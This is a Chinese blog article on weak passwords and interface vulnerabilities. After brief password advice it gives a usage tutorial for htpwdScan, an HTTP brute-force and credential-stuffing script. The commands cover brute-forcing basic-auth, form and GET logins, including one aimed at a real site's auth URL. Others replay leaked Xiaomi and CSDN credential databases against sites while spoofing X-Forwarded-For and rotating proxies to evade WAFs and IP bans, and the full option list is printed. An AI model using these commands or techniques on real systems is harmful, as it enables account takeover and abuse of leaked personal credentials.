首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >接口漏洞

接口漏洞

作者头像
Mirror王宇阳
发布于 2020-11-13 02:56:49
发布于 2020-11-13 02:56:49
99200
代码可运行
举报
运行总次数:0
代码可运行

接口漏洞

作者:王宇阳 时间:2019-06-07

弱口令

弱口令,指通常很容易被人猜测或破解工具破解的口令;弱口令的危害往往很大。

弱口令的危害:

  • 攻击者可以通过弱口令轻易的进入系统或管理页面,最终达到控制权限的目的
  • 通过弱口令可以获得一个人的相对性的账户权限

利用弱口令而保护的资料,实际上就是透明的资料。

最常见的弱口令:

Fuzz弱口令:https://github.com/TheKingOfDuck/fuzzDicts

网络专家们的建议则是:”数字+字母+大小写+符号“是相对比较安全的密码策略

一些密码的建议:

  1. 不适用纯数字作为密码策略
  2. 不使用连贯的有简单逻辑规律的数字、字母、符号组合作为密码策略
  3. 密码长度应该在8位以上
  4. 采用四种不同的字符类型的策略
  5. 密码内容不要包含简写、别称等内容

接口漏洞:HTTP 口令爆破

htpwdScan:HTTP爆破、撞库脚本

htpwdScan:是一个基于python编写的HTTP暴力破解、撞库的攻击脚本

  • 支持批量校验并导入HTTP3代理,低频撞库可以成功攻击大部分网站,绕过大部分的waf
  • 直接获取网络上泄露的社工库,发起撞库攻击
  • 支持导入超大字典
  • https://github.com/lijiejie/htpwdScan

htpwdScan的简单示例

  • HTTP Basic认证 htpwdScan.py -u=http://auth.58.com/ -basic user.txt password.txt 导入用户名密码字典即可
  • 表单破解 htpwdScan.py -f post2.txt -d user=user.txt passwd=password.txt -err="success":false" 从 post2.txt 导入抓的http包,user和passwd是需要破解的参数,而 user.txt password.txt 是保存了密码的字典文件 success":false 是选择的失败标记,标记中若有双引号,请记得用右斜杠 \ 转义
  • GET参数破解 htpwdScan.py -d passwd=password.txt -u="http://xxx.com/index.php?m=login&username=test&passwd=test" -get -err="success":false" 使用-get参数告诉脚本此处是GET请求
  • 撞库攻击 htpwdScan.py -f=post.txt -database loginname,passwd=xiaomi.txt -regex="(\S+)\s+(\S+)" -err="用户名或密码错误" -fip htpwdScan.py -f=post.txt -database passwd,loginname=csdn.net.sql -regex="\S+ # (\S+) # (\S+)" -err="用户名或密码错误" -fip 使用小米和csdn库发起撞库攻击。post.txt是抓包的HTTP请求 参数-regex设定从文件提取参数的正则表达式,此处需分组,分组的方式是使用括号() 小米的数据行格式是 xxx@163.com xxxxxxx 也即 (用户名)空白字符(密码) (\S+)\s+(\S+) 可指定第一个非空白字符拿去填充loginname,而第二个非空白字符串拿去填充passwd csdn的数据行格式是zdg # 12344321 # zdg@csdn.net . 正则表达式写作\S+ # (\S+) # (\S+) 第一个#后面的非空白字符串填充passwd,第二个#后面的非空白字符串填充loginname 请注意,参数的顺序是重要的 -fip 是启用伪造随机IP
  • 校验HTTP代理 htpwdScan.py -f=post.txt -proxylist=proxies.txt -checkproxy -suc="用户名或密码错误" 要破解某个网站,批量测试使用代理是否连通目标网站,把HTTP请求保存到post.txt,然后用-suc参数设定连通标记 一个简单可行的校验方式是: htpwdScan.py -u=http://www.baidu.com -get -proxylist=available.txt -checkproxy -suc="百度一下"

完整参数说明

脚本支持的小功能较多,请耐心阅读以下完整说明。建议多使用 -debug 参数查看HTTP请求是否有问题,没问题再发起真正的破解。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
usage: htpwdScan.py [options]

* An HTTP weak pass scanner. By LiJieJie *

optional arguments:
  -h, --help            显示帮助

Target:
  -u REQUESTURL         设定目标URL, 示例.
                        -u="https://www.test.com/login.php"
  -f REQUESTFILE        从文件导入HTTP请求
  -https                当从文件导入HTTP请求时,启用https(SSL)
  -get                  使用GET方法,默认: POST
  -basic  [ ...]        HTTP Basic 暴力破解.
                        示例. -basic users.dic pass.dic

Dictionary:
  -d Param=DictFile [Param=DictFile ...]
                        为参数设定字典文件,
                        支持哈希函数如 md5, md5_16, sha1.
                        示例. -d user=users.dic pass=md5(pass.dic)

Detect:
  -no302                无视302跳转, 默认302敏感
  -err ERR [ERR ...]    响应文本的破解失败标记,
                        示例. -err "user not exist" "password wrong"
  -suc SUC [SUC ...]    响应文本中的破解成功标记,
                        e.g. -suc "welcome," "admin"
  -herr HERR            响应HTTP头的破解失败标记
  -hsuc HSUC            响应HTTP头的破解成功标记
  -rtxt RetryText       响应文本中的重试标记,出现则重试请求,
                        示例. -rtxt="IP blocked"
  -rntxt RetryNoText    响应文本中的重试标记,未出现则重试请求,
                        示例. -rntxt="<body>"
  -rheader RetryHeader  响应头中的重试标记,出现则重试请求,
                        示例. -rheader="Set-Cookie:"
  -rnheader RetryNoHeader
                        响应头中的重试标记,未出现则重试请求,
                        示例. -rheader="HTTP/1.1 200 OK"

Proxy and spoof:
  -proxy Server:Port    设定少量HTTP代理
                        示例. -proxy=127.0.0.1:8000,8.8.8.8:8000
  -proxylist ProxyListFile
                        从文件批量导入HTTP代理,
                        示例. -proxylist=proxys.txt
  -checkproxy           检查代理服务器的可用性.
                        可用代理输出到 001.proxy.servers.txt
  -fip                  生成随机X-Forwarded-For欺骗源IP
  -fsid FSID            生成随机session ID. 示例. -fsid PHPSESSID
  -sleep SECONDS        每次HTTP结束,等待SECONDS,
                        避免IP被临时屏蔽,进入黑名单

Database attack:
  -database DATABASE    导入社工库中的数据.
                        示例. -database user,pass=csdn.txt
  -regex REGEX          从社工库中提取数据的正则表达式,必须分组.
                        示例. -regex="(\S+)\s+(\S+)"

General:
  -t THREADS            工作线程数,默认50
  -o OUTPUT             输出文件.  默认: 000.Cracked.Passwords.txt
  -debug                进入debug模式检查HTTP请求和HTTP响应
  -nov                  只显示破解成功的条目,不显示进度
  -v                    show program's version number and exit

脚本安装包分析

lin目录
  • cmdline.py:解析命令行参数,校验完整性
  • console_width.py:计算机终端宽度,输出自适应
  • encodings.py:平台相关的编码和解码
  • proxy.py:导入HTTP代理
  • queue.py:生成字典队列
  • request_fil.py:从text文件中解析解析并导入HTTP请求
  • request.py:发起HTTP请求,分析HTTP响应的判断逻辑
dict目录
  • 该目录是密码文件目录

BurpSuite爆破网页密码

  • 可以使用Burp软件进行暴力破解
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-06-07 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。
ApacheCN_飞龙
2019/02/15
1.4K0
米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
Redis未授权访问漏洞复现
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。
LuckySec
2022/11/02
1.8K0
Redis未授权访问漏洞复现
米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历
弱口令没有严格和准确的定义,通常认为容易被别人(它们有可能对你很了解)猜测或被破解工具破解的口令均为弱口令。弱口令指的是仅包含简单数字和字母的口令,例如”123”、”abc”等,因为这样的口令很容易被别人破解。
ApacheCN_飞龙
2019/02/15
7950
米斯特白帽培训讲义 漏洞篇 弱口令、爆破、遍历
安全攻防 | mysql安全问题及修复方式
声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。
安全小王子
2023/02/25
1.1K0
安全攻防 | mysql安全问题及修复方式
Moriarty Corp靶场攻略
Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务器进行web攻击,依据提交flag后的提示信息,逐步获取内网主机权限。本次靶场环境包含以下10个关键部分:
安全小王子
2020/07/31
1.8K0
Moriarty Corp靶场攻略
代理工具shadowProxy之神出鬼没的切换IP地址
前言 在渗透测试过程中,往往会遇到特别“小气”的目标,稍微碰一下就封IP。这种情况下,我们很自然的想到通过网上大量的免费代理进行IP隐匿。 那么问题来了,难道拿到哪些个代理,每用一次手动换下一个代理? 这太像火铳的工作方式了,想想就心累了。 so,小弟就来造一台机关枪,突突突突突… 想想就挺带感。 功能实现 . 代理功能 主要使用python内建的http.server和http.client库实现。 http.server相关的代码解读可参考我前一篇文章 Python源码分析之从SocketServe
企鹅号小编
2018/02/02
1.3K0
代理工具shadowProxy之神出鬼没的切换IP地址
网络安全自学篇(十六)| Python攻防之弱口令、自定义字典生成及网站暴库防护
免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!
天钧
2020/03/26
2.7K0
网络安全自学篇(十六)| Python攻防之弱口令、自定义字典生成及网站暴库防护
唯快不破的分块传输绕WAF
前言 某重保项目,需要进行渗透,找到突破口,拿起sqlmap一顿梭,奈何安全设备在疯狂运转,故祭起绕过注入的最强套路-分块传输绕过WAF进行SQL注入。安全人员当然安全第一,拿到渗透授权书,测试时间报备等操作授权后: 神马探测 因为客户授权的是三个段,资产众多,且时间紧张,多工具搭配同时进行资产探测。故先对三个段使用资产探测神器goby和端口神器nmap一顿怼,还有静悄悄不说话的主机漏扫神器Nessus。因此也就结合探测出来的ip和端口及其他资产详情,信息探测进行时,先根据目前得到的web网站一顿梭。在浏
FB客服
2023/04/26
5960
唯快不破的分块传输绕WAF
VulnHub通关日记-DC_9-Walkthrough
DC-9是 DC 系列的最后一个靶机了,这项挑战的最终目标是扎根并读取唯一的标志。
Gcow安全团队
2020/03/21
1K0
如何针对 SSH 服务的暴力破解
关于 SSH 服务的暴力枚举,应用场景主要包括外围的边界突破以及内网的横向移动,所以可能需要在多种平台上使用这样的工具,本文主要介绍几款工具,包括 python 版、Go 语言版、C/C++ 版、C# 版等,根据自己的应用场景选择适合的版本即可。
信安之路
2021/07/06
1.6K0
常见的未授权访问漏洞
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能 未授权访问管理控制台,通过该漏洞,可以后台管理服务,可以通过脚本命令执行系统命令,如反弹shell,wget写webshell文件
黑白天安全
2021/04/07
4.6K0
常见的未授权访问漏洞
WEB基础题-攻防世界
引言:这里是我做的攻防世界-WEB-基础题的一些writeup,同样也是在大一学期末编写的,一些内容难免写的生硬,但是对面萌新来说是很好的上手wp,在过程中遇到任何问题大家都是可以一起探,部分解题思路借鉴了其他博主,如果哪些地方有问题或更好的思路,请评论区给出指正和意见。
Baige
2022/03/18
5710
WEB基础题-攻防世界
干货 | 渗透测试全流程归纳总结
  从旁观者的角度了解整个WEB应用乃至整个目标的全貌,但是资产是收集不完的,可以边收集,边进行一定程度的测试。信息收集最小的粒度应是目录。
HACK学习
2021/03/03
4.5K0
小白博客 Linux下暴力破解工具Hydra详解
Number one of the biggest security holes are passwords, as every password security study shows. Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is flexible and very fast. Hy
奶糖味的代言
2018/04/12
3K0
网络安全,WiFi密码爆破教程建议收藏吃灰
字典破解就是通过比较合理的条件,筛选或者过滤掉一些全字符组合的内容,大幅降低爆破的成本。
入门笔记
2023/03/08
18.2K0
网络安全,WiFi密码爆破教程建议收藏吃灰
攻防演练-某集团红队检测
链接:https://github.com/EdgeSecurityTeam/EHole
hyyrent
2022/12/26
7860
攻防演练-某集团红队检测
开源综合性网络安全检测和运维工具-TscanClient
在当今数字化的时代,网络安全问题日益凸显,企业和个人面临着各种各样的网络威胁。为了有效应对这些威胁,一款强大的网络安全检测和运维工具显得尤为重要。今天,我要给大家介绍一款开源综合性网络安全检测和运维工具——TscanClient。
星哥玩云
2025/07/23
470
开源综合性网络安全检测和运维工具-TscanClient
Windows主机sqlmap安装及使用
1、先下载python2.7.9版本(支持Python 2.7或Python 3版本)
lan8864
2024/05/08
1.1K0
Windows主机sqlmap安装及使用
[工具使用]BurpSuite
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。 首先推荐一款火狐中的插件 FoxyProxy
李鹏华
2024/03/12
3510
[工具使用]BurpSuite
一文搞懂 Burp Suite:零基础也能玩转 HTTP 攻防!
你知道为什么 Burp Suite(简称 BP)能成为全球黑客的 "标配神器" 吗?关键就藏在它的基因里 —— 作为一款基于 Java 开发的跨平台工具,它就像数字世界的 "变形金刚",只要你的设备装上 JDK(Java 运行环境),无论是 Windows、Mac 还是 Linux 系统,BP 都能无缝畅跑,真正实现 "一次编写,处处可用"。
ICT系统集成阿祥
2025/03/27
3440
一文搞懂 Burp Suite:零基础也能玩转 HTTP 攻防!
相关推荐
米斯特白帽培训讲义(v2)漏洞篇 弱口令、爆破、遍历
更多 >
LV.1
这个人很懒,什么都没有留下~
交个朋友
加入腾讯云官网粉丝站
蹲全网底价单品 享第一手活动信息
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验